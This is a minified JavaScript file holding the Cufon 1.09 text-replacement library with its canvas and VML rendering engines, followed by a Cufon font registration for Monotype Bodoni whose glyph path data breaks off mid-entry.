/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Digitized data copyright Monotype Typography, Ltd 1999. All rights reserved.
 * Monotype Bodoni® is a trademark of Monotype Typography, Ltd which may be
 * registered in certain jurisdictions.
 * 
 * Trademark:
 * Monotype Bodoni® is a trademark of Monotype Typography, Ltd which may be
 * registered in certain jurisdictions.
 * 
 * Description:
 * Modern serif
 * 
 * Manufacturer:
 * Agfa Monotype Corporation
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.agfamonotype.com
 * 
 * License information:
 * http://www.agfamonotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"30,-8r0,-194r-22,0r0,-8v19,0,35,1,53,-2r0,204r20,0r0,8r-73,0r0,-8r22,0xm116,-8r-52,-60r50,-47r-26,0r0,-8r66,0r0,8r-30,0r-34,32r64,75r14,0r0,8r-75,0r0,-8r23,0","w":169,"k":{"y":3,"o":3,"e":3}},{"d":"133,0v0,48,10,57,58,58r0,8v-50,5,-105,-12,-102,-66v-40,-12,-72,-57,-73,-105v-2,-54,45,-109,98,-109v49,0,97,55,97,108v0,48,-37,98,-78,106xm167,-112v0,-61,-5,-94,-53,-94v-54,0,-54,39,-54,106v0,57,1,97,53,97v54,0,54,-45,54,-109","w":226,"k":{"Y":27,"W":12,"V":15,"U":12,"T":-3,"A":21,".":27,",":21}},{"d":"102,-117v-42,0,-40,57,-38,109r20,0r0,8r-72,0r0,-8r22,0r0,-107r-22,0r0,-8v18,0,40,-1,52,-2v1,9,-2,23,1,30v9,-39,80,-42,82,2v11,-19,24,-32,46,-32v52,0,34,67,37,117r22,0r0,8r-72,0r0,-8r20,0r0,-77v-2,-19,3,-32,-13,-32v-39,0,-43,58,-40,109r20,0r0,8r-70,0r0,-8r20,0v-5,-38,13,-109,-15,-109","w":260,"k":{"y":6,"u":3}},{"d":"102,-117v-42,6,-39,58,-38,109r21,0r0,8r-73,0r0,-8r22,0r0,-194r-24,0r0,-8v17,0,43,1,54,-2r1,117v20,-47,96,-38,83,28r0,59r20,0r0,8r-71,0r0,-8r21,0v-5,-39,14,-104,-16,-109","w":176,"k":{"y":9}},{"d":"129,-156v0,48,-66,51,-62,96r-7,0v-19,-65,48,-74,52,-114v4,-35,-66,-41,-73,-9v8,3,22,5,21,18v-1,8,-8,15,-16,15v-11,0,-17,-8,-17,-21v0,-23,23,-41,47,-41v32,0,55,27,55,56xm67,4v-10,1,-20,-10,-20,-20v0,-10,10,-20,20,-19v10,-1,21,9,20,19v0,11,-9,20,-20,20","w":140},{"d":"47,-74v5,40,-4,71,31,71v21,0,35,-13,43,-39r7,0v-5,27,-23,45,-52,46v-34,1,-63,-32,-63,-65v0,-35,29,-66,66,-66v23,0,44,15,45,33v0,8,-7,16,-16,16v-19,1,-18,-24,-8,-31v-19,-23,-59,-9,-53,35","w":136,"k":{"l":-3,"k":-3}},{"d":"158,-62v0,52,-72,97,-96,37r0,27v-12,-2,-35,-2,-52,-2r0,-8r21,0r0,-194r-21,0r0,-8v17,0,41,1,52,-2r0,110v25,-52,96,-12,96,40xm100,-120v-44,-3,-49,71,-27,101v8,10,17,15,27,15v27,0,23,-23,23,-59v0,-37,6,-55,-23,-57","w":173,"k":{"y":9,"w":12,"v":12,"u":6,"l":9,"b":9,".":12,",":9}},{"d":"78,-214r66,112r-19,0r-50,-86r-50,86r-19,0r66,-112r6,0","w":150},{"d":"48,-48v0,10,-9,19,-20,15v-3,13,18,26,36,28r0,-92v-58,-16,-59,-88,0,-102v1,-7,-3,-18,7,-15r0,14v9,-1,11,-1,21,0r0,-14r8,0r0,15v25,2,42,17,44,39v0,10,-6,17,-15,17v-9,0,-16,-6,-15,-16v-2,-13,26,-15,7,-26v-5,-3,-11,-6,-21,-7r0,77v63,19,58,102,0,115r0,34r-8,0r0,-32v-8,1,-15,2,-21,2r0,30r-7,0r0,-31v-28,-5,-48,-21,-50,-47v-2,-22,34,-28,34,-4xm71,-192r0,66v4,2,11,5,21,8r0,-74v-7,-1,-13,0,-21,0xm64,-130r0,-60v-36,10,-36,48,0,60xm92,-6r0,-78r-21,-9r0,88v8,2,9,1,21,-1xm100,-81r0,73v40,-12,40,-59,0,-73"},{"d":"78,4v-34,0,-64,-31,-64,-66v0,-35,29,-65,65,-65v36,0,64,29,64,64v0,36,-30,67,-65,67xm78,-3v30,-4,30,-20,30,-59v0,-39,0,-54,-30,-58v-30,4,-29,20,-29,59v0,39,0,54,29,58","k":{"y":6,"x":9,"w":9,"v":15,".":6,",":3}},{"d":"139,-61v-1,-35,-13,-45,-51,-42r0,95r37,0r0,8r-107,0r0,-8r33,0r0,-194r-33,0r0,-8r177,0r2,64r-7,0v-5,-28,-14,-56,-57,-56r-45,0r0,91v34,2,50,-6,51,-39r8,0r0,89r-8,0","w":206,"k":{"r":15,"o":27,"l":-6,"e":27,"a":24,"A":39,".":62,",":59}},{"d":"30,77r0,-287r68,0r0,8r-44,0r0,271r44,0r0,8r-68,0","w":106},{"d":"161,-175v0,27,-21,33,-48,44r50,81v13,-18,21,-41,24,-72r-31,0r0,-9r62,0r0,9r-24,0v-2,33,-10,59,-26,79r25,35r23,0r0,8r-62,0v-5,-7,-9,-13,-13,-17v-41,39,-131,25,-129,-37v1,-37,29,-59,62,-69v-33,-43,-17,-86,34,-89v26,-1,53,14,53,37xm133,-174v3,-35,-47,-40,-47,-12v0,9,8,26,23,49v18,-8,22,-14,24,-37xm78,-116v-66,16,-19,109,22,109v11,0,24,-5,37,-16v-23,-33,-43,-64,-59,-93","w":226},{"d":"7,-210r100,0r0,8r-33,0r55,148r50,-148r-34,0r0,-8r75,0r0,8r-32,0r-71,207r-4,0r-78,-207r-28,0r0,-8","w":226,"k":{"y":33,"u":33,"r":24,"o":42,"i":12,"e":42,"a":36,"Q":15,"O":15,"G":15,"C":15,"A":45,";":38,":":38,".":68,"-":30,",":65}},{"d":"133,-8v42,1,48,-25,57,-60r8,0r-6,68r-176,0r0,-8r33,0r0,-194r-33,0r0,-8r105,0r0,8r-35,0r0,194r47,0","w":206,"k":{"y":3,"w":3,"Y":27,"W":18,"V":24,"U":9,"T":6}},{"d":"10,-210r104,0r0,8r-34,0r61,93r61,-93r-38,0r0,-8r74,0r0,8r-27,0r-66,101r0,93r35,0r0,8r-108,0r0,-8r36,0r0,-88r-70,-106r-28,0r0,-8","w":243,"k":{"v":39,"u":30,"q":38,"p":30,"o":39,"i":15,"e":38,"d":35,"a":36,"S":3,"O":12,"G":12,"C":12,"A":45,";":35,":":35,".":56,"-":35,",":53}},{"d":"22,-111r76,0r0,-76r17,0r0,76r76,0r0,16r-76,0r0,76r-17,0r0,-76r-76,0r0,-16","w":213},{"d":"12,-185v-11,-13,8,-28,19,-17v14,13,31,37,44,52r-4,4v-17,-11,-48,-27,-59,-39","w":106},{"d":"191,-154v-4,-49,-48,-50,-103,-48r0,90v35,3,55,-4,54,-39r8,0r0,89r-8,0v1,-39,-17,-44,-54,-42r0,96v63,3,111,-1,109,-62r8,0r-2,70r-186,0r0,-8r34,0r0,-194r-34,0r0,-8r178,0r4,56r-8,0","w":223},{"d":"178,-139r38,92r57,-155r-31,0r0,-8r61,0r0,8r-21,0r-77,207r-6,0r-40,-97r-39,97r-6,0r-84,-207r-23,0r0,-8r218,0r0,8r-22,0xm152,-202r21,52r21,-52r-42,0xm132,-45r23,-58r-41,-99r-46,0","w":310,"k":{"y":30,"u":33,"r":24,"o":36,"i":15,"h":3,"e":35,"d":35,"a":33,"O":18,"G":15,"C":15,"A":42,";":33,":":33,".":62,"-":33,",":60}},{"d":"76,-210r0,287r-67,0r0,-8r43,0r0,-271r-43,0r0,-8r67,0","w":106},{"d":"85,-202v-49,-3,-59,19,-68,64r-8,0r5,-72r179,0r5,72r-8,0v-9,-45,-18,-67,-68,-64r0,194r37,0r0,8r-112,0r0,-8r38,0r0,-194","w":206,"k":{"z":15,"y":12,"w":12,"u":15,"s":18,"r":12,"o":24,"m":12,"l":-6,"h":-3,"e":21,"c":21,"a":15,"Q":-9,"O":-9,"G":-9,"C":-6,"A":21,";":9,":":9,".":35,"-":12,",":33}},{"d":"84,5v-24,-3,-23,-32,-13,-55r51,-123v-28,2,-65,-4,-88,3v-6,1,-2,29,-17,25r16,-57r109,0v-17,60,-66,117,-42,189v0,8,-7,19,-16,18"},{"d":"88,-116v-40,-3,-60,7,-63,42r-7,0r0,-49r105,0r0,7r-75,109v43,2,63,-5,69,-45r6,0r0,52r-110,0r0,-8","w":136,"k":{"o":-3,"e":-6,"d":-3,"c":-6}},{"d":"60,-50v-59,-2,-55,-78,-4,-77v12,0,22,4,30,12v4,-2,4,-10,12,-9r0,35r-7,0v-2,-36,-56,-41,-63,-10v3,15,12,18,33,18v64,0,58,85,4,85v-12,0,-23,-5,-34,-15v-5,3,-7,11,-16,10r0,-46r5,0v9,29,24,44,45,44v19,0,44,-23,26,-39v-4,-3,-14,-7,-31,-8","w":120,"k":{"w":6}},{"d":"0,-214r17,0r73,219r-17,0","w":89},{"d":"60,-126v22,-4,117,65,123,1r7,0v-1,25,-13,44,-38,44v-38,0,-109,-63,-122,0r-7,0v1,-27,15,-41,37,-45","w":213},{"d":"16,-65v0,-53,72,-88,97,-35r0,-25v18,2,34,2,53,2r0,8r-23,0r0,188r21,0r0,9r-77,0r0,-9r26,0r-1,-93v-29,50,-96,4,-96,-45xm75,-5v27,-3,38,-21,38,-56v0,-35,-10,-56,-40,-59v-25,4,-22,25,-22,59v0,36,0,52,24,56","w":173},{"d":"90,-171v12,47,8,93,-39,104v43,13,53,57,39,105v1,20,15,31,35,36r0,5v-53,-4,-67,-60,-51,-110v-1,-16,-17,-30,-36,-32r0,-6v20,-2,35,-16,36,-33v-4,-31,-15,-64,8,-88v11,-11,25,-19,43,-22r0,6v-19,4,-34,16,-35,35","w":153},{"d":"40,9v21,23,50,9,50,-41r0,-170r-36,0r0,-8r104,0r0,8r-31,0r0,148v5,54,-24,79,-67,82v-22,2,-46,-15,-48,-